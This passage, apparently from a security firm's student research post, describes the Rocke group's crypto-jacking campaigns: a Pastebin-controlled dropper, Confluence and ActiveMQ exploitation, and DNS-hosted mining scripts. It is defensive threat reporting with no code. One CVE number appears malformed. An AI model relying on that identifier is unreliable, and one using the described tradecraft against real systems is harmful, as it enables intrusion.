Rocke: The Chinese-speaking cybercrime group dubbed Rocke has been around since early 2018 and has carried out various crypto-jacking schemes. In March of 2019, the group began using a Golang-based dropper dubbed LSD that used Pastebin for its Command and Control (C2) servers, according to Anomali labs. The new malware allowed the group to set up Monero (XMR) crypto-jacking operations. Rocke managed to do this with nearly non-existent detection rates by anti-virus products, which was much lower than the detection rates for the group’s malicious tools developed in Python. A month after the Pastebin C2 servers were discovered, the group began exploiting CVE-2019-3396 in vulnerable Confluence servers for remote code execution. This vulnerability allowed the group to drop crypto-miner payloads onto Confluence servers. In July, Rocke switched from Pastebin C2 servers to hosting their own, which allowed them to host their crypto-mining scripts and take them out of the public eye, reducing the chance of the servers being taken down. In September the group shifted their Domain Name System (DNS) text records to store crypto-mining scripts instead of pastes from Pastebin. With all these changes, the group also began to use a different vulnerability known as CVE-2016-03088, which is an exploit against ActiveMQ servers.
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is